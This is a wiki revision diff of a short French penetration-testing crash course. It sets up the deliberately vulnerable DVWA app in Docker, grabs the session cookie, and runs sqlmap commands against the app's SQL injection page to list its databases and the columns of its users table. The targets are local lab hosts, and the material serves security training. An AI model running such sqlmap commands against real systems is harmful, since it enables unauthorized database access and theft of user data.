Difference between revisions of "Pentest101"

From Tmplab
(Created page with " == Crash course == <code> * Documentation docker : https://git.interhacker.space/alban/docker-vulnerable-dvwa * docker run --rm -it -p 80:80 albancrommer/dvwa * browser http:...")
 
(Crash course)
Line 1: Line 1:
  
 
== Crash course ==
 
== Crash course ==
<code>
+
 
* Documentation docker : https://git.interhacker.space/alban/docker-vulnerable-dvwa
+
 
* docker run --rm -it -p 80:80 albancrommer/dvwa
+
* <code>Documentation docker : https://git.interhacker.space/alban/docker-vulnerable-dvwa</code>
* browser http://localhost
+
* <code>docker run --rm -it -p 80:80 albancrommer/dvwa</code>
* Se logger comme admin:password
+
* <code>browser http://localhost</code>
* F12 dans chrome/firefox => Récupérer la valeur du cookie de session dans la transaction (ex: PHPSESSID=9r4jeti966r0k54v91pfu58a32)
+
* <code>Se logger comme admin:password</code>
* sqlmap -u 'http://127.0.0.1/vulnerabilities/sqli/?id=&Submit=Submit' --cookie='security=low;PHPSESSID=$SESSIONCOOKIE; ' -D -p id --dbs
+
* <code>F12 dans chrome/firefox => Récupérer la valeur du cookie de session dans la transaction (ex: PHPSESSID=9r4jeti966r0k54v91pfu58a32)</code>
</code>
+
* <code>sqlmap -u 'http://127.0.0.1/vulnerabilities/sqli/?id=&Submit=Submit' --cookie='security=low;PHPSESSID=$SESSIONCOOKIE; ' -D -p id --dbs</code>
 +
 
  
 
On obtient la liste des bases de données à partir d'une appli faillible en injection SQL... Que faire ensuite ?  
 
On obtient la liste des bases de données à partir d'une appli faillible en injection SQL... Que faire ensuite ?  

Revision as of 23:33, 24 September 2020

Crash course


On obtient la liste des bases de données à partir d'une appli faillible en injection SQL... Que faire ensuite ?

sqlmap -u "http://dvwa.lab.local/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=$SESSIONCOOKIE;security=low" -D dvwa -T users --columns